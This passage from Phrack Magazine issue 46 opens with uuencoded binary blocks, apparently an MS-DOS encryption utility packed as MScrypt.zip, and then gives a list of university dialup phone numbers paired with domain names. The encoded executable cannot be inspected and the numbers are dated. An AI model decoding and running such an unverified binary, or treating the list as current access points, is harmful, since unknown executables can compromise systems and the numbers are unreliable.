MA=_F.G`BP"T_^)W7+BO[DGWM>O[7KH5F%/_)J-.MI>)@6C,25:,JPVNG]?$U3,3P5R0K:L^W@=h MEOB)!6NV&@_%J(:U9"*!#14E`E3\&Z=7*(;^G(JBO6IX_HM;9_4DB51P!LV+=3G/1Q\.AX9DQ?@4@?ZL8O.Q@3651OX(#*P$?'._'O:/P&Q@]RCLh MJNZ6KH^QEW#'J6'1)]+!5_@XU1#=7,K'C[&XO=A5W6NU$4?5-,_>QYSh MH:TNP?Q>8[K:N$7ETUZ7F;0HGH-SD&+9,`8E['P^SV]M(I(;3,8DXGT1B=DWh MB:/IVP6MC$N-A#9M[[8H\ECV):F_9h MDD7XP"^&WA9^R/V*_NPM"UT(^'\CW995;,(H0$?R,[5^)FB'Y/#`A@2R`)QQh M]Y#=J^\JVD:IE_H6L??,WEP^T+3/I]M1;U\/H27*$H`SRQB<`:/]T]0VGH-!!?>0Q0.7.0Y=4J=%^,PO+)h M%VUT+7S2>GO5%.99=?0A7];^/\Q*=G'):7X<^R>[6,Z$W;\O#"9^ILY#\T1\h M=L$]??_O)*I1MDE?;__\253/MZ_H8?ZR2J0'+FFS22M[1NJ/-):I3N84DDMHh MNI(*>CIJX@J\NSD67N67(h MC]]'V(6+V,?8A;>L"V]$%M\]!##J$[CX?\/BVS:P:TMIC1+U)3A3DI\#+JQ/h MM'?S_FGN6$ZA3T*I2MFN=>I(,67LH\FJB=LO<>\@Q&W^EV\7F3CX"-\C41J*h M3EVN[\;^R"OM2S])&W4JMM<%7/W="BZ5H;#&)2HTZM"AV^;0/XZ'9^XMTK/Ph ME(^&OVYH*L>L=>+?M-"Q@V'GZ0%9=S*+OJ_7D6[PO#?+R>?'Z3Y8K@-R[,K\>:,I8\Th M!;`>50F'DP+8P2Q&.G3T1T]-S6L?9NXVXU]"A:9U^)@5_1+$XN)0;VU\3&V]h MKN&.7$T+7-8H\W'PE@CCRH^'UU_9R!F^4:H?3Y-M(X[+!-=_:;E)"Z+XR%DUh MVYZQ20L-1W=:DA9-4_[LJOU%#72F%55[65?-541K)h MK^:UQ`UM]X?'&[&5$&A>Q26W1I+7E)+7\I@WK"!YH2JAY>EH3h M+7M5&,[M%&'FS48=`2J-9=IO&,,9^LPE)+JTWE)7M=*74X78R7R+0;Q6@?0Jh MK-K*&#SH*[E0IZ/AO0XO_NQ!D:L9&FM-Y\6-R7,;DIQK]S&W0QKQ(Q]X7Z\Rh MY%=6TWCZD,I8VKD2ZSOH>O)74[[PR2A>2Q:Q@E:DT(U,8K8>=J:':E^:':G?h ME>CR]+8C:ONI195C:%KWI3V;HE#YAYFTS<,W3R8I8AD"9.XWH-8P51T+#R,Zh M'NJ85EH&A>("EN@T+QMLR*,[MF92X99\,?>2&!../O##4'9I>1XH;HY,9GP'h M4Q0!')%7%&9R?'9B\TE6N%>U82;X;^+[7!85G^-:LW'12QOZ0P?".Y85?8EKh M@7'1,"F#>*!&9Y4G5-4^S;0%&Y>X_?MD)%ZO]^#%_ERI\QR^RRK$ZSY)BL.;h M4[5SGMM[5-/<#FL:Z4W;\M<6^3_T'Z&:'Q]OYBOQ"/";$2WIO7U/IXE[3)@/T2h MU#]YNDS.:&$?%8="&_(O%-[^"]Y6^9NE[X@JGE,+>-Z#64"UZ*U!>[NB2]-Xh M;ZBA$V,R?1]Z-+^Z+W*NXK9O0W(FV^,FWG_CM_]@:B>#<'DN.)]4UE1>8H:_h M^?"_[^J&%:RL_1C2=(Q1PIY*O[RW+I'!UF_OZ,I:!#8]DV08h M8_^0`WZP#+)AD!?(B\SLZT!>"]P0QH1.X8B(MR%AT82DI[,S@\NICP+!K!8Wh M&#$6Y1!GAUF'&KJh M"!KY42D8^JG!T3@??)#[PP^G(\D9%5AT,.34R,!#)='&WL+&*:B+.\!-GM*_h MHJ0+#'G67_&;_UN].,Y1KB@`6T\*G):+=3K(&MX9`:\\2NF/1YT%,<*F/5L1h M]LIBPC]XHHZD>[/E,^1ZYQQ8)GD".'_&#+Y#^'\I,?OM3B,^>Q4N`'\)@$>^h M$8%"/OV7!#-D,]3M5D.RALJ8&"M#315%&*0+&S.+6<;!5M@Q-)ATGAPX[AJKRS\U::ZHHU,L_-FFN)454#'L%/!`E<2W=!*>KU0@=:2h M2>I=%"@SF1'PY[T;:1H(9+#Z^$?N\EO1))W`@;:'074YD%02_?X/GD$SQ?O1h M]7IOYLV!_;_!&_'B\R$^$'?7`4Z.G=R^TQ!DY3H`4E0Q`)V5'\[$L2BLQ<2"h M1Z)$!3MQ;JC1>S;#(BU2QOJ]!IR6S'U<^W!VB%74MR:M#?4H4#5G\3h M>@95M+:$FREA2I]]#L,.V@)W\QYP,"3GIBHC!=FIOA)[YX,T03'*@-PR[%',h M4%W=M-=2[^>1M?N>&DV(Xh MW-+?+^FE+?99J6ZA!N;)!]S2G7C,WG=]7;^T+//D.GI\*/1RJM/OKI-:"#KWh M=!U<.&\IB/U(4\$OZLWEI>:V6DQ&7UD.AY^F--A&V3'%R14@-?09IMUK)R1+h MW'@.F].QMQ)FFMW%Z;G-XB=L637A86T&F&KW#,RZU)*:$8$$I3?NDK8F3="=h M5S_Q:K7/5/3'`1@QJ9*\&'(,'WT&"I[<;N-?6(=1<3F,U^.M#J:Q7ZI/]/"IX?74T7PA6H!#.L]64;0;h MUM]`U$:?E#@'WT_7XZO-7K"47(.GPB??(\?;,+'1H,`/9^,E\ZMU0^&;?0$Kh M&8'0'T<`;#IT1G((W\,%?-E=T+O]1[6((+GH;_=:Q6"[0Z1&FP_9ST\2LN22h M'\0TG47H3=73FXOC8B%S&;;:_)6O)VWC^7N_\L?FR4-OJ]h M9<:V3-S]A^DEJT\[U\_TGW'QMW)R49Q_U]M@/OR[[Z"<_@?KTW=.A$`Z&Q9/h M4;W>YNHYHQ&[^^/D06R#OXLP2>L)5Z^*JE.AYT(D&XKZB6&DKN?>CDOKQ[`4h MY6![.V]G`]EECEO>P/`V.!`[)"]JR`"NC`WOT(^QA.P9U>TP745#M%TZL7V)h M4175C5]D<(B:0)-H&A@;$&#J-0ZL8HA<1PJ^S:]8-N9AY,:;@NHHEM2$_RW"h MEXPAHSXX.NC;J\2[1+V9:_`9N%:LD._G,U9*]RUEP+L:%'WB_@]S!4QK#'4Yh M--W0A^<@('\]$\.4SWJ-0;;'BX@M<=^((/[OKZQ]`WE+W)+0;MKGP?$#+V_^h M[Z\FC@VL#Z)XE^7L[JEK^I>]W]S%N%_K@.C0)$\FMG"=FS;Z>4?!QKL_Y\&V]PNIP;>?S>##7>_Z\&&"M\MS@3]h M(`?VXCKVAS/;VJNG5PUD[.RZ)R"Ih M)2IFX4XKF-Z!/I2Z^A#:D17-5M!#@X[7.8731YS7.;AG<3!4Q_3W2[L<,&(:h M,[F3F)@);%JRGJ?8BQPEZZ@N[3\CJGI;>1E6TUTZL@E/00+5^:4Z[G->U=-&8QO&Q0J/9C[9!"h M8O$PN^ZF+X6!K:%&HXOX(&['2M^12B-!6:+TQ\T7&.'+G^M#EKGR//O\(XQDR0:3&BO)?B+h MM?C8O`,M\9N(OST#>2^S'6%ZA\GK!0RUT(Y8'0GTA99U(;R,P-Y#C*NN&F]&h M$?Z*4N?(RJ;ZVD5,%6VVJ@?<]K?D]AEJY3P>;>2]V8F"ZE+&VTW4RJWPO?Y'h M(H&G(W\XPO@FP['N9*B)R9%P!J=["&5P%6]$]'C&7>"(V_?N24I<2-MP9^'Qh M&0A&J;+>&=KNQ:K2U30W$TV20.3@#^E\0#\7J`-2K)B+F9U0\Z4,=B!#5ZP%h MC]0"F3_N.MH=@[.M\;%I8I]6^%$Z"E[@L]2^`:+XJO1]7.)W;;`OW>V9#N&Bh M0\S62KA8\\$2TPM]//6NZ@NXVYU]=:^9N)!USDW'3N"M$h MV6U$X+N4KXYD=#S/8,K82KQ37=Y_$3&=XC>K_EF$\\<4&%WX`:EP)1M6]H;Rh MU^[@3U,ZZIB:#Z%L'N/'Z%QX^)-F31"2%H$+<3(1,LLF?S`&JX^Y53T;/"<77RQQh ME9@O-`\!L#WW3<`^#5D.E/>/W8I_9&?I@(T\3R8C.[^,1NP(]NY$A_$(YS$^h M,1O6Q&_GAY]7_P2B0_2X;S!#W[^:0?CCL5TQ@K6%"'=3NK:3/CN@1V5[;W%/h M="VPY+&Z6TKZG::L.:UA9O-:S;6)VR^$.:APJB*K='QR(^B]#!D^I%WB*[P3TW4U*+6^M]9KT2-EK9DFZO?!14CBMM-;:?4D6NO+h M[8ZZ^UU[>9G=_]9]G6%`*F4BQ(MAPN#ZV)B<'V["+$B1.)M@BJ]C[$3JK",?5h MTNO[_)M;"N+E^:>G>7YT6P9X.B*L5KIR+7\+@[W;#%KVMAQ,"XZFL&T=S:;I"])OR>h M+^D+T!F`O334(^(=,BKPW#^ZK8:V8BOU=[,OD6FM_GV.MV%]K;A*`=A(CZG3Q]5IB*OB2+3h M4E4C&1)FMM]?I$?&@R=FU>*)Y\0=^<2KF4V%S4`+?A9^L<)h M3T_8$2#NCKQFW.:$K$CL/5H$?>N0-[UM1GG9-M(-;F&-$V_J-@^LK08FV$V;h M1/P[_#OM`87P!.KT[^$4&!"$(N)H,"?S`5=[-9=IX#-\Y&7T)Q'_Z<.FACCTh M\LZ>1]@='OETUW-A(9S'-MJ;;$C[!,):MJRSF2/OYQ0^"D[SM+O37][,L)GAh M2[ZD[RLNT;+M*NL1J_"12=YVO:W<777UW;WB-/?6]UX0L.TNWA:JUK^YTVD1h M2[!&ET]Y+V-\B3KKK6]NC2R-C?9M7O+"]N-;WPXY&86FF3+V9I$7USK4:[,Qh MZ-=L$7E[?(V5O=:ZX>%X/5PM[F@CX<-U<+K`(/AOMA?6]]KM8C67-O,1K1M/h MO.^^;X;PJ78$5*%CJ7807B?(J_/^9^W&TMQWQ_?],F*0\H/-O"3EJG,)S3ZRh MYJ!B6[767(P1`#$A#8?J=7\QNKJ_FIO!1\&Y/;]/3U(S5555'?_-K+^EOZCLh MQZK*RHLZ/_4_)LUA_3^1M0,6/AL_I9F'S,V_VG[,VG5OUNM9h MO_J?LP[_[#86F_J<_R/B_17W6_;?,_.6&`G\I^W\W?[9/Y7]OX[U'_\?MDO)h ?Q@O.N$_Y(^\0??-'T%W5;-PEAFKB#[MVT,U,B:P[`/^#h `h end ExorCrypt MSdos version: -=) S.Encode v2.5 (=- begin 777 MScrypt.zip M4$L#!`H````&`%*WF6F[C95"R!T``/TM```+````35-C&4/`!(#h M)!4V)S@Y:GM,G6X?"08!$S3E]I;WFVKM'_`B0((`00(D#?#___$"`2*,NY'Zh M@.L];'M`@`H!RA7XK=G5@`_0T[*U$?!_P8"'K;J8/6ZY`-&G-&CUZG&C^IXCh M7A[QQHTZ#CW8+\&!?`T4.T&_(G$+%@@5/?.$@XD+7.S5X/^;N$4Y>R]G)S@3h M&/(1"UP[;FC2;>M=@>A]8&MBH_Y'`J]+$;>T=)^$K[@TM^3-$TA6>^HD0?03h MU&E^ZAR?NJ-11^]2E[ZU+@IV;A"]?P_1CBBK2_X'T.X>!XROHQW=J%W_V_6/h M&PKSC8V"@O[J!^@-6#U=C_^H'#0GU2]J3W_'E_=K<-%QRLM?[QP2V.L/2'=@h M^NL`(*2ZMY?-7=2M!?W_S_&\'[/'"E"17S=V"GJ@4_N+L\,\J/B`h MDNWLK>2MD-;7D+>AN:+C:O@](P+TBX%:<6LABI:((&Q\?81K#N::UG_@VM.Yh MO2(K,>O)6-/CK'G0@)"67CZ0:->/6XV7R=HB]C(Oh MV'LQ3>7K&Y3MN/>,P1$-V0F`B1[P)=QAAR\!3$5?(O6'^!*(CHI,RS?P)?"4h MKFGM!KY$$9GL>P%-.*9O6M>WKJ\(R1KW9$V/LN9JZ,F5[#S)TQTUZ8.3=F.@JSE(V;FZ9[E"V^,P%F#J.=:V"F1S#+h MYFA="'Q0#]6C=R*MZQU">E88S^[C6;]Z75R^ZW"`M&$V#\E3X%R!S4'^=G.$h M;=3"5]X/[!\@1+D#?1&OW_'UP,2='MP_%Z+%C^@["H`-!77V_YG$/YB\?YN)h M32(%0.Q$!G_CL0E.!X_4YFBA``?>3R2T,QZ^TOO][;25G&^3LY/_;h M8\'<4`^N?";T\U4M[<$'=':L?I+L/\YL_]^FMLW;)K9AMZ:HL]XG]OT!#L>Eh MU(ZQXUIXVSQNT"C`L@5.U:SO'$#+$[09V*=9@=:MUSV(%:K-_Q;5`'I2LN.-h M%)F/WI48`ZQQ?&*/IX+:8&J`#C\X7U)W6@+1F?UBAW8%CG?IV`!3FQCS+`$6h M-XA7(&/M,[<-O4[[`]^F_!K1!/1]JWU6W5?FNZV9<7]Z@QP-A?_^W<("L,4=F[0_7#HA4h MM?A[0&JQN,53h M??(2UG\$[),<^70;>@1=SDQ;-)?%IG7XSOMS%3Y]NKCA>/O_HZ^7YZP.![\Gh MN+C@PJ("ZQ>QW^V`!HK&OH<5HH_>FFT`(CGL7INW<`09^I>4!@:`DQX?U'CR;Vh MR1W`%FKV^]$71_^EO^_``!T1CK/F"9+N?IX)Z=[GV9#N6P5H>NU1)]**3MK)h M23L7:Z71<\S0X>_#9XM/3UEQ0OJN+L!UX_&OT<\4(!B_>_4OQBXJ-D^\78h M!^[CK`;SGT.'%K=1UZQ537U=?6^Y#;C$],/RJNJ"KS/*_P4`[@/7YX4DS_[Bh MV[C]FE,NQBGWLK>?<$I5_05M$#87VGQ]M.*@ZO@YS8M@OIB0N8MY5P'NM^8Ih M(]#)2D_\7]HY,<&>#7Q<^B'X@_L0M=3[=Vh M[(WW3SI^8F">.X=\UHG]`BQ:!$FT^/:)G82:=^D]:=M&6NHOMDK0-U."K7<*h M,WN@ENDRO"15J<]V\_7K+3TR%RX`*[V"RGWTE_]S+`;$^W>W3LL0=.1\\X^Z(Q^\KE`X,[h MNJVQ1;)BE0N1)'PDJNR5%[N(/Z"%X;`_GI[K?KD3SBXMG8M/=L8($(LR/S!Rh M$RS_GXE9-GMTB_-P496X0O)U1X"IPGZ@W`9H?,[P(.46A%UP_4'(/"<\QK`Gh M[@I(7\<\>E;ZBHFOOZ=D'\R>X%6KOA$&7/DOY;E](K@P7-U*2JDF*Q!3_>A@h MXPASV@01R)L3:J]?SD3$+R!\\@X7PV."6DG2!IBD^@6L7!T(>26P6L`AG7,#h M6?=R1B"0+%R`5$A4>-`.99ZXJGE?C$_9GE[-2'8"9&/]-(*K'&*`]PT`;>!'h M\N?XG!T*/*_!+]GCJT.`WCY3+BSH1>39_%M<.3):21]Y='!@;/@"K95.,#)Sh M`\4&Y@_PR=,C!G!G,=4-`F9J$.3Z=L4>X*3O'_#)?=7.L*[(Q=X#KS.:[U\\h M//KX@=B&MW_HZ&SS!$-=.8[_[*MW+W^A]FQ`h MWH#2+*[U(1GH^)`,KV`O8;+N!_!L-7X&SR(V7P?26G:!@,D:?+>%GC(A%ECSh MRS+_D64@F_B80Q#:BL=0O('B441GDET_^KX4VFQ.3F.'YSD#4#:B'0''C6B@h MTBE0\US)EX"6',B6)*\`XDB:I/_]3KQ")GM:QS\(?,Y_O88$OU=]]=W<6O4'h MA<"AG#54J%/1\V:0$GPQEXOJ!!$?7'\14BK:Y\62C*`*_Z;XR1Q,3D0[@!'Gh M!/YDO0<7>/\W@/AFW>`!DW![$,X;P@S/^/!1`F7PAX"?/+G"]V-IQ=W;AFW1h M=KGN'PBX85-"6?6+Y\&^'CA7`'%`*HB#_!L=/HBY9YC4'V4/'#;%O.<=XBD\h M^?3-1C?0#(>=?\!<0J_8BIS_T.0'.-O9O[OR"0.NIP_Y_K&FB\*!GQ4_^+Q_h MV8`2W`:4=L`_^K>Y,#E=&5/KBN6U]Q1#_,2>=-*OH*1^6DK8`7PLX_72(36Sh MTWUE\O7&(4D[X/6_$9$=)V?F20>$LBH\_0(W<7UGOD^;=M,FYX^H#X&):2[0h M50*;@]EQ3'*P,^<"F>Z9G">R!-=W'REM+#7A"=Q9"2@MM2><5T3?'^UZ!M[3h M.BC2_;WY]0PA$2XGT>P"`>@NJST@$D#[=0)CO_X.SH&/BY#4('(C+C7PB`]`h M:"U@!O<6%]#Y@<&(?O$A^A,U!LWOWNY0LPLT?C!"8`G)D,^#ROP-;!XP&47Ih M]F"$VS\(D:X6R-@"'Q\S-\B(3:]/K2^R>h M^^M7#OU((/UD@GY-T"^G!#=$"O1Z]0V2'+"BKWM$,P%I!FM](AFH/+U?CE!Dh M%2DIMMR``!9D?:#7]5>CA2FLT%@FPAR0H9BOVP-5WMBP9_^C=0!RD_#1+(J=h MX&@0$6&#-@NHX&Z01K&G.T`&S+/$9SJRPML@SH(!#,]'HRPXFH3P,H0W(3P,h MX5T(+T(X'O5H%?D.M""(W9UO0)AU>1IA5ABZ_XS_5_2:&Z@/.O4PST4T2A"Wh MZ`1"T16V84?]^@?%_;\^P?4MZT93[NB-*B:(B&Z+/O,=!GV[-GFB(!]GCQ$2T<#G$J9U`QHI3OF-h MZ2T*T!;)]G''"N'X;<>*X/AI27MBPYS]]RPR]`I[=%ZSP%[P1'Y"M:8'63O(h M1=N:QGHZ")C_#=ASS';']PS`[%*8+\&L0`.FSQ(!)[?X_A,D>DWPCZ&$4*D2h M@6G2\(,L;.2E9P:[=R\"=Q]JL#'XH47?@Q^V?R3WLW:]`1B^WHFZH):A1_>@h M1UL@6C&^)N9RX;CD4S`,D.Z+9%^5240VLL9Y0h M'6W9YD@GH)_'Y*N$NW:!'!3$4UW`NU'!QE+<$.+V?*NMN'4D^[J`(9S9@)BNh MB'^*D$OZ%L>/NH\7".%=[Q<\;_W+,.LQYC'@_SC!QQH^LW0CZ"0`FO4]C+Y-ILX#1O*X*ONN_+PFA!.Z-9>R-L%N,V9]A/E@Zh MP/O:EJ;`'A\6#8-P?&?'LD;G$9G`B9W/X-A;8_`M\0X6;7IC!Y2V<,H^^!)0/^_]AX"X;KJP:(JA+NT%E.9T/C`#*MZ,]%7`[*ML`;(DOQ`>PA4-%2I%h M7^*'9D$YCI\100M)/'UD`%,$J:9L5=\4Z8J0F(BBAXNG^N3X^K0^H\:-HK1.h ML#HRZ.-^*>"4I/?Z4]"YV1`@7F9VN"$_I%8WN=.X7h M@H$;LA%J9)V8WJWX2G^VS41V>MJ#88B.=GW"XT?_AMD-1!:E[0,#H!FU\2DNh M,XJK9P2W8C^BP0T+IB\`9([(,$0)]D8A:@.S7&9J`U%FTI0HNPU.=QO)";X9h MK\/8"G^+5I#H"M:YA-AC"4#:W"(6,,K@TA*(IK!)+MAL3([@\JDPX!.!V,1%]\\_]!1"G1UR^$/.6B:L1ZF-"!2.E_h M-<]:SXS;+0N9Z"M!DTDXMJUP^QF`>_G;4-IM&.;HL].[YP3NI=(-8;L%L_'Mh MH+Y?_,-L+V"V(G,FX:ZGD/6`H<)FDA))N3W=`W_CRX#h M6^EV`!NG=DXYR]EH:6>C$9P-[L++$6VCV^NJ/L037YL6QY'*]17!17ZU);K;h MYO].=AV28-(!GZ@>C8%BZP2-0S-DE96?]H?O_YWBDV:DE8/R`[E'9V`L)A$*h M>_1?`1`MS$PV5@L@:=I$YIYJ7\Q99KN^4K8!JG0BM:GG3+G'L4[V[OXB!]V@h M5JC^U_J['!3/9+%O$39),*[M.J)M2QW/9"Y3-I,PO&$_B*,6EL%]/H'L\h MW7Z^7SJK*4@#(IZ9>95U'U@&_]$8K!9'"DG/TBT'9R,9.>9A\JU!?,Z_,'/,h MMFE.S[8R*+G+6<8"'#U<\`.*?2#RP>EA+LYOY%URIG7PA_N1?O]=(6.h MQ0(\[MNF0,5.3,DA>0RYF>O`L-LS;"E`P)W;9+M#$#",#JYKH8!B/=I.'#>6h MDRI)&_N8:DP%]IW!ZV[3)\),U>T[/0*S`5K3`!.N5WF/\TKS=)&PL80Y78TSh MDR^.QO9"7H#E+KE>`8]PAP,>[!.M(LR+8GV+^=?;4(16861\`>.F37A*$B)!h M*<.8M*_'EES`W2D"REPAK:*ES9\"H.Z?#H(K;UKF?T2KH!!C&B83S@%T\`-"h M4!&'FF[?8(\%O,R.V@']3Z#%Q9"GW:/_N1*J4V6_'QQ@`('CH0'F3S_Z_21;h M6,3*9R?<];1]B$?W$=>CL[\?1AL@D>;M"T-R'O1.^0.UA_1`Y+TZ@+4-[!S.h M'5,/>%SC\K2!D)_^-X!\.=OF'Q*7GX74;GS7_BFH%E"R]#/`7"36Q$S?S]X(h MDJ;]`SG5]`J?\G\-D)=TVX335)R8GCE:2$@9R'.$Z$D#J'@CJ#K2*\L5<0-4h M*^!P8G*"M'E0V<"^N_M)W+`PG!(X1:)7JTWX+4=R#^'RN($PTQO3%_2N@4D([h MXD=,B$:&>"(?H1RZEL<:^LA@0!Y5GZW;`H7H/-Q@/L]3M#.!1=G'AT&`9<"Oh M-;!/LP*M6QL4MX@&O>M8W[BD<^8J?1_B\L=OQ+[NMWJ%]):_Z%)'/KXD+;[Fh MJ0#&VMY.D+5.8I,V#R)^H%DPM9EUP:/BU_54%_[5"T>Y_>#\`4AX8Y_N^O7Fh MF!;!'X/E\_O"01B>(8&42QVVPO4LTEC'#!H?M@5#53O3=#_@@?H=B4#,#:;Th M!V$W(,O76R)62M&R6*_W#2#-'$&:\0-HMLW]:#LNP^``]`+4-]"7LOV;EVDWh M2+O'@S-NR1!+^;&:D3F=M5E\9%(J62W?=5VEZ*T#[(D:H%TD2U3NNLQ\CYH9h M[:\;D(Q=_&)J[5L\H.ZLR.P,=^ZS:]7BZ:,GL>F+*:OF5-DS`E0U=*!D"6+Th M#JH7=VFOM[K>*&[^_]'W3@]U:A1(?:7R\1#JLMM5N0U\Q/[R[`:S;L52]<,$h MLA6!>\`3O>`$9&A\(+Y"Z_"=XWH#L>HKKV^(YI3OG!;h M;?I3?R$+?76WCU7LHWD*-(TK%4<_Q[`OP'[F]22!DK`@RGXT4(&6C]V<2,'&h M"'#W9U@GMDE$<9T@8^R.@0F@_N54>'KG`(/2U4=;)GF[GW.XWQ7(OY6(C@2;h MKE`DC/P<$#GT@?!;-3O-@<(@:'LQS7(^>G/?1?&!^1,S*?/!D2:JF;:\O^5^h M><;:&4??&V./2+)ZYOK>7VU@2\W<7RG,=289$"@h M0#&C]R(;[K^)`#\'B.N6G3I=GVG>C#J8T9L<550DP7SHH.3#(/\B5-8!*?:Dh M08/J_O_7Y$Z+3@50M*.KBQ`>?*!QN16.JO2_+WVDL`XQ>@9.'(%RVEXN_ZS#h MI49%WT'K"$1XY8,_4)X1*:)>;'WE=:6)J_K'FE7K\*E09TKW*%4JE)SO4`U^h M1/\0P(@6C/!'K5M0[872AP,X`\N)]FK7Q?D;*8!:*!)M))@Q^BR/]MI(+L?3[S1(I>N0TWH_3Wh M\TQ(]SZ4@U$3YKEBHA1]SKL?6<*4NS'Z^.C2%R^S[UB&A>XG7A\PP$HJC87]h M2:W0(%CJMRIM@*)/D*YZXP4!A-#JH>'/3Y.,U-Q=1=H@W?3_YC2>h MK6KP$_@(501_=A#@+6B9^5#LH$L6S6`L\*\!AJ%],K2)M06CIJN8B+V5O;O&h MN@4I=09CE9%'!S\PV/`%>C?KV0,F:_`=OPNF&\7>5F,)5CW$1XNG;C!"QTCKh MDAY`].W;11NY?2QQ#U*V4RHQ.>$8PG;=!83O;:X-P/^#68:9C:X=NSX4@-L/h M$&\]=9&+O0=>AS??Q_/*8E-L.#*5=VF?X.K3J\L!9)*=O?T#?QZ!3:)/[JL=h MJ9$.Q6M5XK68M3V=-CZR35$+6T.EQ4MT#+N@N[`G`,`$9SKA`*OCF4IW>TX7h M8$:^47N`/1W1*X(H"48I;*:^!/FZ0_H<6)[OV+\%<_QOEXLH:&VD=WMK:VL>KW_H+RKCDJXZST@207;3_S%*A')&:^0]H\.EEA1%75Z5=ISL/@K6."-<@QRVID_*6&D%_H(@#W:>G5D<=&\#MZ9OO%:/]#>C:T:U(-H;^Dh M=..<[?UU>LL`(97-!UB2RA,;7<=P\:GH,YV0CN`)FN()2J+KY0^@2O$1I=!$h M?WE'(7=>.TJ@Q]$$.">=Y5_N#/+BPZH#Q(WX/3,`;&O+ZQ1JGP'MB,PBY/HBh MY/S^"-F(C6ENQ('1_1LO:E#(IWKB(L(UX2)^^(^UX>T&#JC['(;M[O#_-T'5h M%Q``+^[X3R-^H`'V*SJP#C1W@QD)B_VU@J#-Y0ME?^5CS'^R`HZ=`GX^)^]`h M#^=5"+NEZOO;2HFA@B4!W'"V"[P??Y)PJ?#I!&&@XG8%$CRI>K'PAA;">609O#\VP!Z^C87NIUZ7$[h M_/MF%4;2@/V^^8'1Y33$Q+][@,9TAPG:N;6&WO(36.#:9(&1YEORS(4CV$IVh M6/425%-G&KD0C:WCM*EC1^8L43_@F,7A://HJ5><#/`0F@PBAB;#+9D+4_YIh MWB&Z$90!&QF497@$3D8N<+*\Q,;\1JL*BB=0O`&ALS+^=4M8-(!@=-.I(*76h M==N2:MJV94$R32M6;EBY>4&V!#GT+=R\14L7),JQ*4'&S(DS)TN03=..h ME?MV[ELSTW4O%RZ$?A;Y#>]6@--PP8`#L*CO'/K5:%*F1;\F=6KTR3E@4P08h M.'#@@`&V@04WE0^)AH8B9[60T%AN5H7``Rh M*6#*).$!SR2!,0.^(!A`@,J^"#B#8``+*DDD2K=UV;)-88ROT+Q'N`,+PICFh M:2`8P\;1$@@6>)#A)BR*QW`?TKK#>=SMQG0)$Z28VQUI6KIMP[H%F91N6#:6h M6F$^A94NJA-DR;D@>29U"[>.^6;3LBWK@SG2F$XS,Yh MRWF?+AK$/LT[2CG_W;X1VZ0^+1GS[Y3#OD$:80ZN''8,V.8-?@Y8TV&LLD?#h M6H,L4V3?VK7GGNK0ZOZ29(9]+DL%Q:S9^^YH!\'Z+L,R#P1E*W80^Q*Qh M)I1CC#9%NE53Q8D[`*/-CX/XFE8I=DNT)h M$V])O"E#&#M,F"G:2;EE%LYRW:(4\\S[#)N9=Y-G@UO+DA&"S=FB=8XT1.O/h MTXFO?=2GC^2EVF!ZF`T5=%YL]K%KLKC=LG+-LGU[)WJ``[;YC&T).OW/8`^2h M;%J[::9HL&_R5@`&SG.`BQBU#/%U;K6CAW-TXIM](R=WTQX3=N,I]=?N_`$0h MFVTL1U:=.X>5$QM+J/\'4$L!`@H!"@````8`4K>9:;N-E4+('0``_2T```L`h M`````````````````````$U38W)Y<'0N97AE4$L%!@`````!``$`.0```/$=h $``````#!h `h end -=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=- ==Phrack Magazine== Volume Five, Issue Forty-Six, File 13 of 28 **************************************************************************** The Phrack University Dialup List [We've been compiling all these for months now, and still have hundreds more to add. If you know dialups for any other .EDU sites or Universities elsewhere in the world that are on the Internet, please mail them to us at phrack@well.com. Please, Universities ONLY...this is a list to assist students. :) ] ----------------------------------------------------------------------------- 201-529-6731 RAMAPO.EDU 201-596-3500 NJIT.EDU 201-648-1010 RUTGERS.EDU 203-432-9642 YALE.EDU 205-895-6792 UAH.EDU 206-296-6250 SEATTLEU.EDU 206-552-5996 WASHINGTON.EDU 685-7724 7796 209-278-7366 CSUFRESNO.EDU 209-632-7522 CALSTATE.EDU 209-474-5784 CSUSTAN.EDU 523-2173 667-3130 723-2810 210-381-3681 PANAM.EDU 3590 210-982-0289 UTB.EDU 212-206-1571 NEWSCHOOL.EDU 229-5326 212-854-1812 COLUMBIA.EDU 1824 1896 3726 9924 212-995-3600 NYU.EDU 4343 213-225-6028 CALSTATELA.EDU 213-259-2732 OXY.EDU 213-740-9500 USC.EDU 214-368-1721 SMU.EDU 3131 215-359-5071 DCCC.EDU 215-436-2199 WCUPA.EDU 6935 215-489-0351 URSINIUS.EDU 215-572-5784 BEAVER.EDU 215-641-6436 MC3.EDU 215-204-1010 TEMPLE.EDU 9630 9638 215-889-1336 PSU.EDU 215-895-1600 DREXEL.EDU 5896 215-896-1318 HAVERFORD.EDU 1824 215-898-8670 UPENN.EDU 6184 0834 3157 216-368-8888 CWRU.EDU 217-333-4000 UIUC.EDU 3700 244-5109 4976 255-9000 219-237-4116 INDIANA.EDU 4117 4186 4187 4190 4413 4415 262-1082 481-6905 980-6553 6556 6866 6869 219-989-2900 PURDUE.EDU 301-403-4444 UMD.EDU 303-270-4865 COLORADO.EDU 447-1564 492-0346 1900 1949 1953 1968 1998 938-1283 303-458-3588 REGIS.EDU 303-556-4982 MSCD.EDU 623-0763 0774 892-1014 303-698-0515 DU.EDU 871-3319 3324 4770 309-438-8070 ILSTU.EDU 8200 309-677-3250 BRADLEY.EDU 310-769-1892 CALSTATE.EDU 310-985-9540 CSULB.EDU 312-362-1061 DEPAUL.EDU 312-413-3200 UIC.EDU 3212 312-753-0975 UCHICAGO.EDU 313-764-4800 MERIT.EDU 258-6811 313-487-4451 EMICH.EDU 314-883-7000 MISSOURI.EDU 315-443-1320 SYR.EDU 1330 3396 1045 317-285-1000 BSU.EDU 1003 1005 1019 1048 1064 1068 1070 1076 1077 1087 1088 1089 1090 1099 1107 1108 317-494-6106 PURDUE.EDU 496-2000 317-455-2426 INDIANA.EDU 973-8265 318-261-9662 USL.EDU 9674 319-335-6200 UIOWA.EDU 402-280-2119 CREIGHTON.EDU 404-727-8644 EMORY.EDU 404-894-2191 GATECH.EDU 2193 2195 407-722-2202 FIT.EDU 407-823-2020 UCF.EDU 407-835-4488 PBAC.EDU 408-425-8930 UCSC.EDU 408-554-5050 SCU.EDU 9652 408-924-1054 CALSTATE.EDU 409-294-1965 SHSU.EDU 409-568-6028 SFASU.EDU 410-329-3281 UMD.EDU 744-8000 333-7447 410-516-4620 JHU.EDU 5350 410-788-7854 UMBC.EDU 410-837-5750 UBALT.EDU 412-396-5101 DUQ.EDU 412-578-9896 CMU.EDU 268-6901 856-0815 412-621-5954 PITT.EDU 2582 3655 